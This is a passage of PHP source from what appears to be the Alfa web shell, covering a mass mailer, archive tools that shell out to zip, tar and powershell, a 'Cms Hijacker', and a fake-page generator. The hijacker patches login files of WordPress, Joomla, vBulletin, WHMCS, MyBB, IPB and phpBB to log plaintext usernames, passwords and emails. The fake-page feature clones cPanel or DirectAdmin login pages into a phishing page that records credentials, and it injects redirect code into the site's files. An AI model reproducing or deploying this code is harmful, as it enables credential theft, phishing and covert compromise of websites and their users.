5321if(!empty($mail_attach)&&@is_file($mail_attach)){
5322$file = $mail_attach;
5323$content = __read_file($file);
5324$content = chunk_split(__ZW5jb2Rlcg($content));
5325$uid = md5(uniqid(time()));
5326$filename = basename($file);
5327$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
5328$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5329$headers .= "Reply-To: ".$mail_from."\r\n";
5330$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
5331$headers .= 'MIME-Version: 1.0' . "\r\n";
5332$headers .= 'X-Mailer: php' . "\r\n";
5333$mail_content = "--".$uid."\r\n";
5334$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
5335$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
5336$mail_content .= $mail_content."\r\n\r\n";
5337$mail_content .= "--".$uid."\r\n";
5338$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
5339$mail_content .= "Content-Transfer-Encoding: base64\r\n";
5340$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
5341$mail_content .= $content."\r\n\r\n";
5342$mail_content .= "--".$uid."--";
5343}else{
5344$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
5345$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
5346$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
5347$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
5348$headers .= 'MIME-Version: 1.0' . "\r\n";
5349$headers .= 'X-Mailer: php' . "\r\n";
5350}
5351if(empty($count_mail)||$count_mail<1)$count_mail=1;
5352if(!empty($mail_from)){echo __pre();
5353for($i=1;$i<=$count_mail;$i++){
5354if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
5355}}else{__alert("Invalid Mail From !");}
5356}else{__alert("Invalid Mail To !");}
5357}
5358echo('</div>');
5359alfafooter();
5360}
5361function alfaziper(){
5362alfahead();
5363AlfaNum(8,9,10);
5364echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
5365<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5366<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
5367<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
5368<input type="submit" value=" " name="ziper" />
5369</form></center></p>';
5370if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5371$dirzip = $_POST['alfa3'];
5372$zipfile = $_POST['alfa4'];
5373if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
5374alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
5375echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5376}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
5377alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
5378echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5379}elseif(class_exists('ZipArchive')){
5380if(__alfaziper($dirzip, $zipfile)){
5381echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
5382}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5383}
5384}
5385echo '</div>';
5386alfafooter();
5387}
5388function __alfaziper($source,$destination){
5389 if(!extension_loaded('zip')||!file_exists($source)){
5390 return false;
5391 }
5392 $zip=new ZipArchive();
5393 if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
5394 return false;
5395 }
5396 $source=str_replace('\\','/',realpath($source));
5397 if(is_dir($source)===true){
5398 $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
5399 foreach($files as $file){
5400 $file=str_replace('\\','/',$file);
5401 if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
5402 $file=realpath($file);
5403 if(is_dir($file)===true){
5404 $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
5405 }else if(is_file($file)===true){
5406 $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
5407 }
5408 }
5409 }else if(is_file($source)===true){
5410 $zip->addFromString(basename($source),file_get_contents($source));
5411 }
5412 return $zip->close();
5413}
5414function alfadeziper(){
5415alfahead();
5416AlfaNum(8,9,10);
5417echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
5418<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
5419<div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
5420<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
5421<input type="submit" value=" " name="ziper" />
5422</form></center></p>';
5423if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
5424$dirzip = $_POST['alfa3'];
5425$zipfile = $_POST['alfa4'];
5426if(@!is_dir($zipfile)){
5427 @mkdir($zipfile, 0777, true);
5428}
5429$finfo = "";
5430$file_type = "";
5431if(function_exists('finfo_open')){
5432$finfo = @finfo_open(FILEINFO_MIME_TYPE);
5433$file_type = @finfo_file($finfo, $dirzip);
5434@finfo_close($finfo);
5435}else{
5436 if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
5437 $file_type = alfaEx('file -b --mime-type ' . $dirzip);
5438 }
5439}
5440if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
5441alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
5442echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
5443}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
5444switch ($file_type) {
5445 case 'application/zip':
5446 alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
5447 break;
5448 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
5449 if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
5450 alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
5451 }else{
5452 alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
5453 }
5454 break;
5455}
5456echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
5457}elseif(class_exists('ZipArchive')){
5458 $itsok = false;
5459 if(emtpy($file_type)){
5460 $file_type = "application/zip";
5461 }
5462 switch ($file_type) {
5463 case 'application/zip':
5464 $zip = new ZipArchive;
5465 $res = $zip->open($dirzip);
5466 if ($res) {
5467 $zip->extractTo($zipfile);
5468 $zip->close();
5469 $itsok = true;
5470 }
5471 break;
5472 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
5473 if(strstr(basename($dirzip), ".tar.gz")){
5474 $new_file = $zipfile .'/'. basename($dirzip);
5475 @copy($dirzip, $new_file);
5476 $new_tar = str_replace(".tar.gz", ".tar", $new_file);
5477 try {
5478 $p = new PharData($new_file);
5479 $p->decompress();
5480 $phar = new PharData($new_tar);
5481 $phar->extractTo($zipfile);
5482 @unlink($new_file);
5483 @unlink($new_tar);
5484 $itsok = true;
5485 } catch (Exception $e) {
5486 }
5487 }else{
5488 try {
5489 $phar = new PharData($dirzip);
5490 $phar->extractTo($zipfile);
5491 $itsok = true;
5492 } catch (Exception $e) {
5493 }
5494 }
5495 break;
5496 }
5497if($itsok){
5498echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
5499}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
5500}
5501}
5502echo '</div>';
5503alfafooter();
5504}
5505function alfacmshijacker(){
5506alfahead();
5507AlfaNum(5,6,7,8,9,10);
5508echo '<div class=header><br>
5509<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
5510<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
5511$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
5512foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5513echo("</select>");
5514echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
5515SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
5516<input type="submit" name="btn" value=" "></form></center><br>';
5517$cms = $_POST['alfa1'];
5518$saveto = $_POST['alfa2'];
5519$cmspath = $_POST['alfa4'];
5520if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
5521echo __pre();
5522alfaHijackCms($cms,$cmspath,$saveto);
5523}
5524echo '</div>';
5525alfafooter();
5526}
5527function alfaHijackCms($cms,$cmspath,$saveto){
5528switch($cms){
5529case "vb":
5530hijackvBulletin($cmspath,$saveto);
5531break;
5532case "wp":
5533hijackwp($cmspath,$saveto);
5534break;
5535case "jom":
5536hijackJoomla($cmspath,$saveto);
5537break;
5538case "whmcs":
5539hijackWhmcs($cmspath,$saveto);
5540break;
5541case "mybb":
5542hijackMybb($cmspath,$saveto);
5543break;
5544case "ipb":
5545hijackIPB($cmspath,$saveto);
5546break;
5547case "phpbb":
5548hijackPHPBB($cmspath,$saveto);
5549break;
5550default:
5551echo "error!";
5552break;
5553}
5554}
5555function hijackvBulletin($path,$saveto){
5556$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5557$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
5558$code=str_replace('{saveto_path}',$saveto,$code);
5559$login = $path."/login.php";
5560$class = $path."/includes/class_bootstrap.php";
5561$dologin = 'do_login_redirect();';
5562$evil_login = "\t".$code."\n\t".$dologin;
5563$evil_class = "true";
5564if((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){
5565$data_login = @file_get_contents($login);
5566$data_class = @file_get_contents($class);
5567if(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){
5568$login_replace = str_replace($dologin,$evil_login, $data_login);
5569$class_replace = str_replace($clearpw,$evil_class, $data_class);
5570@file_put_contents($login, $login_replace);
5571@file_put_contents($class, $class_replace);
5572hijackOutput(0,$saveto);
5573}else{
5574hijackOutput(1);
5575}
5576}else{
5577hijackOutput(1);
5578}
5579}
5580function hijackwp($path,$saveto){
5581$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5582$redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
5583$code=str_replace('{saveto_path}',$saveto,$code);
5584$login=$path."/wp-login.php";
5585if(@is_file($login) AND @is_writable($login)){
5586$data_login = @file_get_contents($login);
5587if(@preg_match($redirect_wp, $data_login, $match)){
5588$evil_login = "\t".$match[0]."\n\t".$code;
5589$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
5590@file_put_contents($login, $login_replace);
5591hijackOutput(0,$saveto);
5592}else{
5593hijackOutput(1);
5594}
5595}else{
5596hijackOutput(1);
5597}
5598}
5599function hijackJoomla($path,$saveto){
5600$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
5601$code=str_replace('{saveto_path}',$saveto,$code);
5602$comp=$path."/administrator/components/com_login/";
5603if(@is_file($comp."/login.php")){
5604$login = $comp."/login.php";
5605}elseif(@is_file($comp."/admin.login.php")){
5606$login = $comp."/admin.login.php";
5607}else{
5608$login = '';
5609}
5610if(@is_file($login) AND @is_writable($login) AND $login != ''){
5611$data_login = @file_get_contents($login);
5612$evil_login = $code."\n".$data_login;
5613@file_put_contents($login, $evil_login);
5614hijackOutput(0,$saveto);
5615}else{
5616hijackOutput(1);
5617}
5618}
5619function hijackWhmcs($path,$saveto){
5620$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
5621$code=str_replace('{saveto_path}',$saveto,$code);
5622$conf=$path."/configuration.php";
5623if(@is_file($conf) AND @is_writable($conf)){
5624$data_conf = @file_get_contents($conf);
5625if(!strstr($data_conf,'?>'))$code = '?>'.$code;
5626$evil_conf = $data_conf."\n".$code;
5627@file_put_contents($conf, $evil_conf);
5628hijackOutput(0,$saveto);
5629}else{
5630hijackOutput(1);
5631}
5632}
5633function hijackMybb($path,$saveto){
5634$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
5635$find = '$loginhandler->complete_login();';
5636$code=str_replace('{saveto_path}',$saveto,$code);
5637$login=$path."/member.php";
5638$evil_login = "\t".$code."\n\t".$find;
5639if(@is_file($login) AND @is_writable($login)){
5640$data_login = @file_get_contents($login);
5641if(strstr($data_login, $find)){
5642$login_replace = str_replace($find,$evil_login, $data_login);
5643@file_put_contents($login, $login_replace);
5644hijackOutput(0,$saveto);
5645}else{
5646hijackOutput(1);
5647}
5648}else{
5649hijackOutput(1);
5650}
5651}
5652function hijackIPB($path,$saveto){
5653$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
5654$find = 'unset( $member[\'plainPassword\'] );';
5655$code=str_replace('{saveto_path}',$saveto,$code);
5656$login=$path."/admin/sources/handlers/han_login.php";
5657$evil_login = "\t".$find."\n\t".$code;
5658if(@is_file($login) AND @is_writable($login)){
5659$data_login = @file_get_contents($login);
5660if(strstr($data_login, $find)){
5661$login_replace = str_replace($find,$evil_login, $data_login);
5662@file_put_contents($login, $login_replace);
5663hijackOutput(0,$saveto);
5664}else{
5665hijackOutput(1);
5666}
5667}else{
5668hijackOutput(1);
5669}
5670}
5671function hijackPHPBB($path,$saveto){
5672$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
5673$find = 'case \'login\':';
5674$code=str_replace('{saveto_path}',$saveto,$code);
5675$login=$path."/ucp.php";
5676$evil_login = "\t".$find."\n\t".$code;
5677if(@is_file($login) AND @is_writable($login)){
5678$data_login = @file_get_contents($login);
5679if(strstr($data_login, $find)){
5680$login_replace = str_replace($find,$evil_login, $data_login);
5681@file_put_contents($login, $login_replace);
5682hijackOutput(0,$saveto);
5683}else{
5684hijackOutput(1);
5685}
5686}else{
5687hijackOutput(1);
5688}
5689}
5690function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
5691function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
5692if(@is_dir($dir)){
5693$files=@scandir($dir);
5694foreach($files as $key => $value){
5695$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
5696if(!@is_dir($path)){
5697if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
5698if($e=='str'){
5699$content = @file_get_contents($path);
5700if(strpos($content, $string) !== false){
5701echo str_replace('\\','/',$path) . "<br>";
5702}
5703}else{
5704if(strstr($value,$string)){
5705echo str_replace('\\','/',$path) . "<br>";
5706}
5707}
5708$results[] = $path;
5709}elseif($value != "." && $value != "..") {
5710Alfa_StrSearcher($path,$string,$ext,$e,$results);
5711$results[] = $path;
5712}}}}
5713function alfafakepage(){
5714 alfahead();
5715 AlfaNum(9,10);
5716 echo '<div class=header><br>
5717 <center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\'fakepage\',null,this.clone_page.value,this.fake_root.value,\'>>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
5718 <div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">';
5719 $cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");
5720 foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
5721 echo("</select></div>");
5722 echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
5723 <div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="'.$_SERVER["DOCUMENT_ROOT"].'/fake_page_root/"></div>
5724 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="'.$_SERVER["DOCUMENT_ROOT"].'/index.php"></div>
5725 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: '.$_SERVER["DOCUMENT_ROOT"].'/wp-login.php"></div>
5726 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="'.$GLOBALS['cwd'].'logs.txt"></div>
5727 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
5728 <div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
5729 $clone_page = $_POST['alfa1'];
5730 $fake_root = $_POST['alfa2'];
5731 $logto = $_POST['alfa4'];
5732 $panel = $_POST['alfa5'];
5733 $inject_to = $_POST['alfa6'];
5734 $bind_on = $_POST['alfa7'];
5735 $count = $_POST['alfa8'];
5736 if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
5737 echo __pre();
5738 $target = $clone_page;
5739 $curl = new AlfaCURL();
5740 $source_page = $curl->Send($target);
5741 if(!empty($source_page)){
5742 $matched_form = "";
5743 if($panel == "cpanel"){
5744 if(preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)){
5745 $matched_form = $match[0];
5746 }
5747 }else{
5748 if(preg_match('#<form(.*?)>#', $source_page, $match)){
5749 $matched_form = $match[0];
5750 }
5751 }
5752 if(!empty($matched_form)){
5753 $fake = "";
5754 $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
5755 $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
5756 if($panel == "cpanel"){
5757 $port = "2083";
5758 }else{
5759 $target = str_replace(array("http://", "https://"), "", $target);
5760 $port = explode(":",$target);
5761 $port = $port[1];
5762 }
5763 if(substr($uri, 0, 1) == "/"){
5764 $uri = substr($uri, 1);
5765 }
5766 $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
5767 $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
5768 if($panel == "cpanel"){
5769 $form = '<form novalidate id="login_form" action="'.$log_url.'" method="post" target="_top" style="visibility:">';
5770 }else{
5771 $form = '<form action="'.$log_url.'" method="post">';
5772 }
5773 $fake = str_replace($matched_form, $form, $source_page);
5774 if(@!is_dir($fake_root)){
5775 @mkdir($fake_root, 0777, true);
5776 }
5777
5778 $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);
5779
5780 $post_user = 'user';
5781 $post_pass = 'pass';
5782 $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
5783 if($panel != "cpanel"){
5784 $post_user = 'username';
5785 $post_pass = 'password';
5786 $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
5787 }
5788
5789 $cpanel_log = '<?php $cook_time = time()+(86400 * 7); $user = $_POST["'.$post_user.'"];$pass = $_POST["'.$post_pass.'"];if(!empty($user) && !empty($pass)){if(!isset($_COOKIE["'.$cookie_name.'"])){@setcookie("'.$cookie_name.'", 0, $cook_time, "/");$_COOKIE["'.$cookie_name.'"]=1;}if((int)$_COOKIE["'.$cookie_name.'"]>'.$count.'){@header("Location: /");exit;}@setcookie("'.$cookie_name.'", ((int)$_COOKIE["'.$cookie_name.'"] + 1), $cook_time, "/");$fp = @fopen("'.$logto.'", "a+");@fwrite($fp, $user . " : " . $pass . "\n");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';
5790
5791 @file_put_contents($fake_root.'/log.php', $cpanel_log);
5792
5793 if($panel == "cpanel"){
5794 $fake = preg_replace(array('#<link(.*)href="(.*)"(.*)>#', '#<img class="main-logo" src="(.*)"(.*)>#', '# <a(.*)id="reset_password">#'), array('<link href="'.$target.'/$2">', '<img class="main-logo" src="'.$target.'/$1" alt="logo" />', '<a href="#" id="reset_password">'), $fake);
5795 }
5796
5797 @file_put_contents($fake_root.'/index.php', $fake);
5798
5799 $inject_code = '<?php if(isset($_GET[":2083"])&&(int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@include("'.$fake_root.'/index.php");exit;}?>';
5800 $bind_on_code = '<?php if((int)$_COOKIE["'.$cookie_name.'"]<'.$count.'){@header("Location: '.$uri.'");exit;}?>';
5801
5802 @file_put_contents($inject_to, $inject_code . "\n" .@file_get_contents($inject_to));
5803 @file_put_contents($bind_on, $bind_on_code . "\n" .@file_get_contents($bind_on));
5804
5805 echo "success...!";
5806 }else{
5807 echo "failed...!";
5808 }
5809 }else{
5810 echo("<div style='text-align:center;color:red;'>Cannot open the target...!</div>");
5811 }
5812 }
5813 echo '</div>';
5814 alfafooter();
5815}
5816function alfaarchive_manager(){
5817 alfahead();
5818 $file = $_POST['alfa2'];
5819 if(!file_exists($file)){
5820 $file = $GLOBALS['cwd'];
5821 }
5822 $rand_id = rand(9999, 999999);
5823 echo '<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>';
5824 echo '<form name="srch" onSubmit="g(\'archive_manager\',null,null,this.file.value,null,null,\'>>\');return false;" method=\'post\'>
5825 <div class="txtfont">
5826 Archive file: <input size="50" id="target" type="text" name="file" value="'.$file.'">
5827 <input type="submit" name="btn" value=" "></div></form></center><br>';
5828 if($_POST['alfa5']=='>>'){
5829 //echo __pre();
5830 echo '<hr><div style="margin-left: 12px;" archive_full="phar://'.$file.'" archive_name="'.basename($file).'" id="archive_dir_'.$rand_id.'" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>';
5831 echo '<div style="padding: 10px;" id="archive_base_'.$rand_id.'">';
5832 __alfa_open_archive_file($file, $rand_id);
5833 echo '</div>';
5834 }
5835 echo '</div>';
5836 alfafooter();
5837}
5838function __alfa_open_archive_file($arch, $base_id=0){
5839 try{
5840 $files = array();
5841 $dirs = array();
5842 $archive = new PharData($arch);
5843 foreach($archive as $file) {
5844 $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));
5845 if($file->isDir()) {
5846 $dirs[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "dir", "modify" => $file_modify);
5847 }else{
5848 $file_size = @filesize($file->getPathname());
5849 $files[] = array("name" => $file->getFileName(), "path" => $file->getPathname(), "type" => "file", "modify" => $file_modify, "size" => $file_size);
5850 }
5851 }
5852 function __alfa_open_archive_usort($a, $b){
5853 return strcmp(strtolower($a['name']), strtolower($b['name']))*1;
5854 }
5855 usort($dirs, "__alfa_open_archive_usort");
5856 usort($files, "__alfa_open_archive_usort");
5857 $files = array_merge($dirs, $files);
5858 echo '<table width="100%" class="main" cellspacing="0" cellpadding="2"><tbody><tr><th>Name</th><th>Size</th><th>Modify</th><th>Actions</th></tr>';
5859 $icon = '<img class="archive-icons" src="'.findicon('..','dir').'" width="30" height="30">';
5860 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" fname=".." onclick="alfaOpenArchive(this);" path="'.dirname($arch.'.php').'">'.$icon.'<span class="archive-name archive-type-dir">| .. |</span></a><td>dir</td><td>-</td><td>-</td></tr>';
5861 foreach($files as $file){
5862 $icon = '<img class="archive-icons" src="'.findicon($file['name'],$file['type']).'" width="30" height="30">';
5863 if($file["type"] == "dir"){
5864 echo '<tr><th><a base_id="'.$base_id.'" class="archive-file-row" onclick="alfaOpenArchive(this);" path="'.$file["path"].'" fname="'.$file["name"].'">'.$icon.'<span class="archive-name archive-type-dir">| '.$file["name"].' |</span></a><td>dir</td><td>'.$file["modify"].'</td><td>-</td></tr>';
5865 }else{
5866 echo "<tr><th><a base_id='".$base_id."' class='archive-file-row' onclick=\"editor('".$file["path"]."','auto','','','','file');\">".$icon."<span class='archive-name archive-type-file' fname='".$file["name"]."'>".$file["name"]."</span></a><td>".alfaSize($file["size"])."</td><td>".$file["modify"]."</td><td>-</td></tr>";
5867
5868 }
5869 }
